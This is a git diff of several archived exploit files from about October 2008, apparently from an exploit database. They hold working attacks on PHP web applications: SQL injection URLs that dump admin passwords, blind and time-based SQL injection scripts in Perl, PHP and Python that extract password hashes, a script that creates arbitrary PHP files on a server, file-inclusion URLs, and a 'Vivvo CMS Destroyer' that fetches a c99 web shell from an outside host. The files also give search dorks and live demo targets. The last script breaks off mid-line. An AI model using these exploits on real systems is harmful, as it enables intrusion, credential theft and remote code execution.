[2008-10-18] diff --git a/platforms/php/webapps/6780.txt b/platforms/php/webapps/6780.txt index 3355a61aa..cb52eb100 100755 --- a/platforms/php/webapps/6780.txt +++ b/platforms/php/webapps/6780.txt 
@@ -1,47 +1,47 @@ -|___________________________________________________| -| zeeproperty (adid) Remote SQL Injection Vulnerability -|___________________________________________________ -|---------------------- Hussin X -------------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| | -| script : http://www.zeeproperty.com -| -| DorK : :) -|___________________________________________________| - -Exploit: -________ - -www.[target].com/Script/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin-- - - -Demo -________ - -www.zeeproperty.com/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin-- - - -Admin Panel : -________ - -www.[target].com/Script/admin - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|_____________________________________________________________________ - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-10-18] +|___________________________________________________| +| zeeproperty (adid) Remote SQL Injection Vulnerability +|___________________________________________________ +|---------------------- Hussin X -------------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| | +| script : http://www.zeeproperty.com +| +| DorK : :) +|___________________________________________________| + +Exploit: +________ + +www.[target].com/Script/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin-- + + +Demo +________ + 
+www.zeeproperty.com/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin-- + + +Admin Panel : +________ + +www.[target].com/Script/admin + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|_____________________________________________________________________ + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-10-18] diff --git a/platforms/php/webapps/6781.pl b/platforms/php/webapps/6781.pl index a7a7d07a8..32a16813a 100755 --- a/platforms/php/webapps/6781.pl +++ b/platforms/php/webapps/6781.pl 
@@ -1,64 +1,64 @@ -# "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)". - -# Web CMS: http://sourceforge.net/projects/mrbs/ -# Affected: Previous versions of mrbs 1.4 -# Solution: Update to Version 1.4 - -# Doorks: -# "Meeting Room Booking System" "month.php?area=" -# "Meeting Room Booking System" "day.php?area=" -# "Meeting Room Booking System" "week.php?area=" - -# Author: Xianur0 -# Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0 - -# Exploit: - -#!/usr/bin/perl - -#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()' -# -#Exploit MRBS By Xianur0 -# -#Please Have Patience, The Blind SQL Injection is running......... -#pma@localhost -# -# -#Finished! -# - - -# By Xianur0 - - use LWP::UserAgent; - -%ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z"); - - $ua = LWP::UserAgent->new; - $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"); -$url = $ARGV[0]; 
-$sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n"); -print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n"; -$caracter = 1; -$i=0; -$detector = '

    No rooms defined for this area

    '; -$simbolo = ">"; -while($caracter ne "finito") { - $req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i); - $req->header('Accept' => 'text/html'); - $res = $ua->request($req); - if ($res->is_success) { - if($res->content !~ $detector) { -if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";} -$base = $i; -$i = $i+10; -} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";} -} - } else { - print "\nError detected in HTTP requests: " . $res->status_line . "!\n"; - } -} - -print "\nFinished!\n"; - -# milw0rm.com [2008-10-18] +# "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)". + +# Web CMS: http://sourceforge.net/projects/mrbs/ +# Affected: Previous versions of mrbs 1.4 +# Solution: Update to Version 1.4 + +# Doorks: +# "Meeting Room Booking System" "month.php?area=" +# "Meeting Room Booking System" "day.php?area=" +# "Meeting Room Booking System" "week.php?area=" + +# Author: Xianur0 +# Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0 + +# Exploit: + +#!/usr/bin/perl + +#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()' +# +#Exploit MRBS By Xianur0 +# +#Please Have Patience, The Blind SQL Injection is running......... +#pma@localhost +# +# +#Finished! 
+# + + +# By Xianur0 + + use LWP::UserAgent; + +%ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z"); + + $ua = LWP::UserAgent->new; + $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"); +$url = $ARGV[0]; +$sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n"); +print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n"; +$caracter = 1; +$i=0; +$detector = '

    No rooms defined for this area

    '; +$simbolo = ">"; +while($caracter ne "finito") { + $req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i); + $req->header('Accept' => 'text/html'); + $res = $ua->request($req); + if ($res->is_success) { + if($res->content !~ $detector) { +if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";} +$base = $i; +$i = $i+10; +} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";} +} + } else { + print "\nError detected in HTTP requests: " . $res->status_line . "!\n"; + } +} + +print "\nFinished!\n"; + +# milw0rm.com [2008-10-18] diff --git a/platforms/php/webapps/6782.php b/platforms/php/webapps/6782.php index 887fd246b..ce49a92f7 100755 --- a/platforms/php/webapps/6782.php +++ b/platforms/php/webapps/6782.php @@ -1,125 +1,125 @@ -#!/usr/bin/php - StAkeR aka athos - StAkeR[at]hotmail[dot]it - Date -> 18/10/2008 - Get -> http://www.mywebland.com/dl.php?id=2 - ------------------------------------------------------------ - - File del.php - - 25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id']; - 26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; - 27. - 28. if ($confirm=="") { - 29. notice("Confirmation", "Warning : Do you want to delete this post ? Yes"); - 30. } - 31. elseif ($confirm=="yes") { - 32. // Data Base Connection // - 33. dbConnect(); - 34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; - 35. $query = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error()); - 36. $confirm =""; - 37. notice("Del Post", "Data Deleted"); - 38. } - 39. else notice( "Delete Error, Unable to complete the task !" ); - 40. ?> - - NOTE: - - $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; - - $post_id isn't escaped so you can execute SQL Code - - How to fix? sanize $post_id with intval or int (PHP Functions) - - -*/ - - - -function get($host,$path,$evil) -{ - if(!preg_match('/\w:[0-9]/i',$host)) alert(); - $inet = explode(':',$host); - - if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused'); - - $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n"; - $data .= "Host: $host[0]\r\n"; - $data .= "User-Agent: Lynx (textmode)\r\n"; - $data .= "Connection: close\r\n\r\n"; - - fputs($sock,$data); - - while(!feof($sock)) { $html .= fgets($sock); } - fclose($sock); - - return $html; -} - - -function alert() -{ - echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n"; - echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n"; - echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n"; - die; -} - - -function charme($char,$colum,$id) -{ - $sql = "1 or (select if((ascii(substring(password". - ",$colum,1))=$char),benchmark(200000000,char(0)),0)". 
- " from blogusername where id=$id)#"; - - return urlencode($sql); -} - - -$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); -$c = 0; - - -for($i=0;$i<=32;$i++) -{ - for($j=0;$j<=17;$j++) - { - $start = time(); - - get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3]))); - - $stop = time(); - - if($stop - $start > 12) - { - $password .= chr($hash[$j]); - $c++;; - break; - } - } -} - -if(isset($password)) -{ - echo "# Hash: $password\r\n"; - die; -} -else -{ - echo "# Exploit Failed!\r\n"; -} - - - - -?> - -# milw0rm.com [2008-10-18] +#!/usr/bin/php + StAkeR aka athos - StAkeR[at]hotmail[dot]it + Date -> 18/10/2008 + Get -> http://www.mywebland.com/dl.php?id=2 + ------------------------------------------------------------ + + File del.php + + 25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id']; + 26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; + 27. + 28. if ($confirm=="") { + 29. notice("Confirmation", "Warning : Do you want to delete this post ? Yes"); + 30. } + 31. elseif ($confirm=="yes") { + 32. // Data Base Connection // + 33. dbConnect(); + 34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; + 35. $query = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error()); + 36. $confirm =""; + 37. notice("Del Post", "Data Deleted"); + 38. } + 39. else notice( "Delete Error, Unable to complete the task !" ); + 40. ?> + + NOTE: + + $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; + + $post_id isn't escaped so you can execute SQL Code + + How to fix? sanize $post_id with intval or int (PHP Functions) + + +*/ + + + +function get($host,$path,$evil) +{ + if(!preg_match('/\w:[0-9]/i',$host)) alert(); + $inet = explode(':',$host); + + if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused'); + + $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n"; + $data .= "Host: $host[0]\r\n"; + $data .= "User-Agent: Lynx (textmode)\r\n"; + $data .= "Connection: close\r\n\r\n"; + + fputs($sock,$data); + + while(!feof($sock)) { $html .= fgets($sock); } + fclose($sock); + + return $html; +} + + +function alert() +{ + echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n"; + echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n"; + echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n"; + die; +} + + +function charme($char,$colum,$id) +{ + $sql = "1 or (select if((ascii(substring(password". + ",$colum,1))=$char),benchmark(200000000,char(0)),0)". + " from blogusername where id=$id)#"; + + return urlencode($sql); +} + + +$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); +$c = 0; + + +for($i=0;$i<=32;$i++) +{ + for($j=0;$j<=17;$j++) + { + $start = time(); + + get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3]))); + + $stop = time(); + + if($stop - $start > 12) + { + $password .= chr($hash[$j]); + $c++;; + break; + } + } +} + +if(isset($password)) +{ + echo "# Hash: $password\r\n"; + die; +} +else +{ + echo "# Exploit Failed!\r\n"; +} + + + + +?> + +# milw0rm.com [2008-10-18] diff --git a/platforms/php/webapps/6784.pl b/platforms/php/webapps/6784.pl index 60b6fceae..f03acaade 100755 --- a/platforms/php/webapps/6784.pl 
+++ b/platforms/php/webapps/6784.pl 
@@ -1,54 +1,54 @@ -#!/usr/bin/perl -# -------------------------------------------------------- -# PHP Easy Downloader <= 1.5 Remote File Creation Exploit -# By StAkeR aka athos - StAkeR[at]hotmail[dot]it -# On 17/10/2008 -# http://www.hasemithut.de/downloads/index.php -# -------------------------------------------------------- - -use strict; -use LWP::UserAgent; - -my $host = shift(@ARGV); -my $file = shift(@ARGV); -my $http = new LWP::UserAgent; - -if($host !~ /^http:\/\/(.+?)$/ && $file !~ /(\w+)\.([a-zA-Z])?/) -{ - print "[?] PHP Easy Downloader <= 1.5 Remote File Creation Exploit\r\n"; - print "[?] Usage: perl $0 http://[host] [filename]\r\n"; - exit; -} - -chomp(my $code = ); - -if($code !~ /(<\?php|<\?#)(.*?)\?>/) -{ - print "[?] You must insert PHP Code\r\n"; - exit; -} - -my $post = $http->post($host.'/file_info/admin/save.php', - [ - filename => $file, - accesses => $code.'//', - ]); - -if($post->is_success) -{ - if($post->as_string =~ /(Upload Date|Change Made!)/i) - { - print "[?] $host/file_info/descriptions/$file.0 Created\r\n"; - exit; - } - else - { - print "[?] Exploit Failed!\r\n"; - exit; - } -} - - -__END__ - -# milw0rm.com [2008-10-18] +#!/usr/bin/perl +# -------------------------------------------------------- +# PHP Easy Downloader <= 1.5 Remote File Creation Exploit +# By StAkeR aka athos - StAkeR[at]hotmail[dot]it +# On 17/10/2008 +# http://www.hasemithut.de/downloads/index.php +# -------------------------------------------------------- + +use strict; +use LWP::UserAgent; + +my $host = shift(@ARGV); +my $file = shift(@ARGV); +my $http = new LWP::UserAgent; + +if($host !~ /^http:\/\/(.+?)$/ && $file !~ /(\w+)\.([a-zA-Z])?/) +{ + print "[?] PHP Easy Downloader <= 1.5 Remote File Creation Exploit\r\n"; + print "[?] Usage: perl $0 http://[host] [filename]\r\n"; + exit; +} + +chomp(my $code = ); + +if($code !~ /(<\?php|<\?#)(.*?)\?>/) +{ + print "[?] 
You must insert PHP Code\r\n"; + exit; +} + +my $post = $http->post($host.'/file_info/admin/save.php', + [ + filename => $file, + accesses => $code.'//', + ]); + +if($post->is_success) +{ + if($post->as_string =~ /(Upload Date|Change Made!)/i) + { + print "[?] $host/file_info/descriptions/$file.0 Created\r\n"; + exit; + } + else + { + print "[?] Exploit Failed!\r\n"; + exit; + } +} + + +__END__ + +# milw0rm.com [2008-10-18] diff --git a/platforms/php/webapps/6785.txt b/platforms/php/webapps/6785.txt index eaf0bcb24..5c62f3302 100755 --- a/platforms/php/webapps/6785.txt +++ b/platforms/php/webapps/6785.txt 
@@ -1,44 +1,43 @@ - -=========================================================================================== - - - [o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability - - Software : Fast CLick SQL Lite version 1.1.7 - Vendor : http://www.ftrsoft.com/ - Download : http://www.ftrsoft.com/downloads.html - Author : NoGe - Contact : noge[at]mainhack[dot]com - - -=========================================================================================== - - - [o] Vulnerable file - - common/init.php - - require($CFG['CDIR'].'/global.php'); - require($CFG['CDIR'].'/sql.php'); - - - - [o] Exploit - - http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode] - - -=========================================================================================== - - - [o] Greetz - - MainHack BrotherHood [ www.mainhack.com ] - VOP Crew [ Vaksin13 OoN_BoY Paman ] - H312Y yooogy mousekill }^-^{ k1tk4t - skulmatic olibekas ulga Cungkee str0ke - - -=========================================================================================== - -# milw0rm.com [2008-10-19] +=========================================================================================== + + + [o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability + + Software : Fast CLick SQL Lite version 1.1.7 + Vendor : http://www.ftrsoft.com/ + Download : http://www.ftrsoft.com/downloads.html + Author : NoGe + Contact : noge[at]mainhack[dot]com + + +=========================================================================================== + + + [o] Vulnerable file + + common/init.php + + require($CFG['CDIR'].'/global.php'); + require($CFG['CDIR'].'/sql.php'); + + + + [o] Exploit + + http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode] + + +=========================================================================================== + + + [o] Greetz + + MainHack BrotherHood [ www.mainhack.com ] + VOP Crew [ Vaksin13 OoN_BoY Paman ] + H312Y yooogy mousekill }^-^{ k1tk4t + skulmatic olibekas 
ulga Cungkee str0ke + + +=========================================================================================== + +# milw0rm.com [2008-10-19] diff --git a/platforms/php/webapps/6788.txt b/platforms/php/webapps/6788.txt index d26e75c68..3472080c4 100755 --- a/platforms/php/webapps/6788.txt +++ b/platforms/php/webapps/6788.txt 
@@ -1,32 +1,32 @@ -[o]------------------------------------------------------------------------------------[x] - | Local File Include Vulnerability | -[o]------------------------------------------------------------------------------------[o] - | Software : yappa-ng Version 2.3.2 | - | Vendor : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html | - | Date : 19 October 2008 | - | Author : Vrs-hCk | - | Contact : d00r[at]telkom[dot]net | -[o]------------------------------------------------------------------------------------[o] - -[»] Google Dork - - "Powered by yappa-ng 2.3.2" - -[»] Exploit - - http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00 - -[»] Proof of Concept - - http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00 - -[o]------------------------------------------------------------------------------------[x] - | Greetz | -[o]------------------------------------------------------------------------------------[o] - | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | - | Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem, | - | loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ... | - | c0li.m0de.0n & BeHave oR BeGone !!! 
| -[o]------------------------------------------------------------------------------------[o] - -# milw0rm.com [2008-10-19] +[o]------------------------------------------------------------------------------------[x] + | Local File Include Vulnerability | +[o]------------------------------------------------------------------------------------[o] + | Software : yappa-ng Version 2.3.2 | + | Vendor : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html | + | Date : 19 October 2008 | + | Author : Vrs-hCk | + | Contact : d00r[at]telkom[dot]net | +[o]------------------------------------------------------------------------------------[o] + +[»] Google Dork + + "Powered by yappa-ng 2.3.2" + +[»] Exploit + + http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00 + +[»] Proof of Concept + + http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00 + +[o]------------------------------------------------------------------------------------[x] + | Greetz | +[o]------------------------------------------------------------------------------------[o] + | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | + | Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem, | + | loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ... | + | c0li.m0de.0n & BeHave oR BeGone !!! | +[o]------------------------------------------------------------------------------------[o] + +# milw0rm.com [2008-10-19] diff --git a/platforms/php/webapps/6789.pl b/platforms/php/webapps/6789.pl index ca2928d09..eabdb352f 100755 --- a/platforms/php/webapps/6789.pl +++ b/platforms/php/webapps/6789.pl 
@@ -1,119 +1,119 @@ -#!/usr/bin/perl - -#Vivvo CMS Destroyer -#uxmal666@gmail.com -#By Xianur0 -#-------------CREDITS------------- -#http://milw0rm.com/exploits/4192 -#http://milw0rm.com/exploits/3326 -#http://milw0rm.com/exploits/2339 -#http://milw0rm.com/exploits/2337 -#-------------/CREDITS------------- - -print "\n Vivvo CMS Destroyer By Xianur0\n"; - -#-----------CONFIG---------- -$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt'; -$textshell = 'C99Shell v.'; -#----------/CONFIG---------- - use LWP::UserAgent; - use Switch; - my $path = $ARGV[0]; - $path = shift || &uso; -sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;} - $ua = LWP::UserAgent->new; - $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"); - $req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss"); - $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*'); - $res = $ua->request($req); - if ($res->is_success && $res->content =~ "generator") { -&parser($res->content); - } else { - $req = HTTP::Request->new(GET => $path."/index.php?feed"); - $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*'); - $res = $ua->request($req); - if ($res->is_success && $res->content =~ "generator") { -&parser($res->content); - } - else { print "\nError getting data!\n"; exit;} - } - -&backups; - - -sub parser { -my @datos = split('Vivvo CMS ', $_[0]); -my @version = split('', $datos[1]); -$version = $version[0]; -if($version[0] == "") { -my @datos = split('', $datos[1]); -$version = $version[0]; -} -print "Version: ".$version."\n"; -if($version < "4") { print "Outdated version of Vivvo CMS!\n"; &desactualizada($version);} -} - -sub backups { - $req = HTTP::Request->new(GET => "$path/backup"); - $req->header('Accept' => 'text/xml'); - $res = $ua->request($req); - if ($res->is_success) { -if($res->content =~ "Index of /backup") { -print "\n Backups:\n"; -my @datos = split('', 
$archivos); -if($archivo[0] !~ /\?/){print $archivo[0]."\n"; } -} -print "\nUnprotected Directory: $path/backup\n"; - } -} -} - -sub rfi { -$vuln = $_[0]; - $req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?"); - $req->header('Accept' => 'text/xml'); - $res = $ua->request($req); - if ($res->is_success) { -if($res->content =~ $textshell) { -print "RFI Detected!: $path/$vuln=$SHELL?"; - } -}} - -sub sql { -$exploit = "pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1"; - $req = HTTP::Request->new(GET => "$path/$exploit"); - $req->header('Accept' => 'text/xml'); - $res = $ua->request($req); - if ($res->is_success) { -print "SQL Injection Generated: $path$exploit"; -} -} - -sub blind { -for($i=1; $i<32;$i++) { -for($o=30; $o<102;$o++) { -$injection = "$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o; - $req = HTTP::Request->new(GET => $injection); - $req->header('Accept' => 'text/xml'); - $res = $ua->request($req); - if ($res->is_success) { -if($res->content != "") { -print "Blind Done Correctly!: $injection"; - } -} -}}} - -sub desactualizada { -$version = $_[0]; - switch ($version) { - case "3.4" { print "Blind SQL Injection trying ....\n"; &blind; print "Intentando RFI....\n"; &rfi('include/db_conn.php?root');} - case "3.2" { print "RFI trying ....\n"; &rfi('index.php?classified_path'); print "SQL Injection....\n"; &sql;} - else { print "There is no registration for this Exploit Version! 
: (\n";} - } -} - -# milw0rm.com [2008-10-19] +#!/usr/bin/perl + +#Vivvo CMS Destroyer +#uxmal666@gmail.com +#By Xianur0 +#-------------CREDITS------------- +#http://milw0rm.com/exploits/4192 +#http://milw0rm.com/exploits/3326 +#http://milw0rm.com/exploits/2339 +#http://milw0rm.com/exploits/2337 +#-------------/CREDITS------------- + +print "\n Vivvo CMS Destroyer By Xianur0\n"; + +#-----------CONFIG---------- +$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt'; +$textshell = 'C99Shell v.'; +#----------/CONFIG---------- + use LWP::UserAgent; + use Switch; + my $path = $ARGV[0]; + $path = shift || &uso; +sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;} + $ua = LWP::UserAgent->new; + $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"); + $req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss"); + $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*'); + $res = $ua->request($req); + if ($res->is_success && $res->content =~ "generator") { +&parser($res->content); + } else { + $req = HTTP::Request->new(GET => $path."/index.php?feed"); + $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*'); + $res = $ua->request($req); + if ($res->is_success && $res->content =~ "generator") { +&parser($res->content); + } + else { print "\nError getting data!\n"; exit;} + } + +&backups; + + +sub parser { +my @datos = split('Vivvo CMS ', $_[0]); +my @version = split('', $datos[1]); +$version = $version[0]; +if($version[0] == "") { +my @datos = split('', $datos[1]); +$version = $version[0]; +} +print "Version: ".$version."\n"; +if($version < "4") { print "Outdated version of Vivvo CMS!\n"; &desactualizada($version);} +} + +sub backups { + $req = HTTP::Request->new(GET => "$path/backup"); + $req->header('Accept' => 'text/xml'); + $res = $ua->request($req); + if ($res->is_success) { +if($res->content =~ "Index of /backup") { +print "\n Backups:\n"; +my 
@datos = split('', $archivos); +if($archivo[0] !~ /\?/){print $archivo[0]."\n"; } +} +print "\nUnprotected Directory: $path/backup\n"; + } +} +} + +sub rfi { +$vuln = $_[0]; + $req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?"); + $req->header('Accept' => 'text/xml'); + $res = $ua->request($req); + if ($res->is_success) { +if($res->content =~ $textshell) { +print "RFI Detected!: $path/$vuln=$SHELL?"; + } +}} + +sub sql { +$exploit = "pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1"; + $req = HTTP::Request->new(GET => "$path/$exploit"); + $req->header('Accept' => 'text/xml'); + $res = $ua->request($req); + if ($res->is_success) { +print "SQL Injection Generated: $path$exploit"; +} +} + +sub blind { +for($i=1; $i<32;$i++) { +for($o=30; $o<102;$o++) { +$injection = "$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o; + $req = HTTP::Request->new(GET => $injection); + $req->header('Accept' => 'text/xml'); + $res = $ua->request($req); + if ($res->is_success) { +if($res->content != "") { +print "Blind Done Correctly!: $injection"; + } +} +}}} + +sub desactualizada { +$version = $_[0]; + switch ($version) { + case "3.4" { print "Blind SQL Injection trying ....\n"; &blind; print "Intentando RFI....\n"; &rfi('include/db_conn.php?root');} + case "3.2" { print "RFI trying ....\n"; &rfi('index.php?classified_path'); print "SQL Injection....\n"; &sql;} + else { print "There is no registration for this Exploit Version! : (\n";} + } +} + +# milw0rm.com [2008-10-19] diff --git a/platforms/php/webapps/6790.py b/platforms/php/webapps/6790.py index 21f3193fc..afa718a76 100755 --- a/platforms/php/webapps/6790.py +++ b/platforms/php/webapps/6790.py 
@@ -1,54 +1,54 @@ -import sys, urllib2, re - -print "\n " -print " \\#'#/ " -print " (-.-) " -print " -------------------oOO---(_)---OOo--------------------" -print " | rGallery 1.09 (+-) Exploit by Five-Three-Nine |" -print " | Using Blind SQL Injection in 'itemID' of rGallery |" -print " | |" -print " | Greets and Shouts to: |" -print " | tmh, n00bor, activebeta, Ghost, Saufkumpel, Altair |" -print " | crusader727, Nemo, Loader007, J0hn.X3r, sNiper109 |" -print " ------------------------------------------------------\n" - - -if len(sys.argv) != 5: - print "\nUsage: ./rGallery.py " - print "Ex: ./rGallery.py 1 bb1_users 19 http://example.com\n" - sys.exit(1) - -UserID = sys.argv[1] -Prefix = sys.argv[2] -ImageID = sys.argv[3] -Host = sys.argv[4] - -Res = [48,49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102] -MD5 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32] -Hash = "" - -UserID = int(UserID) -UserID -= 1 -UserID = str(UserID) - -for MD5Count in range(32): - for ResCount in range(16): - try: - source = urllib2.urlopen(Host +"/index.php?page=RGalleryImageWrapper&itemID=" + ImageID +"%20and%20ascii(substring((SELECT%20password%20from%20" + Prefix +"%20limit%20"+ UserID + ",1)," + 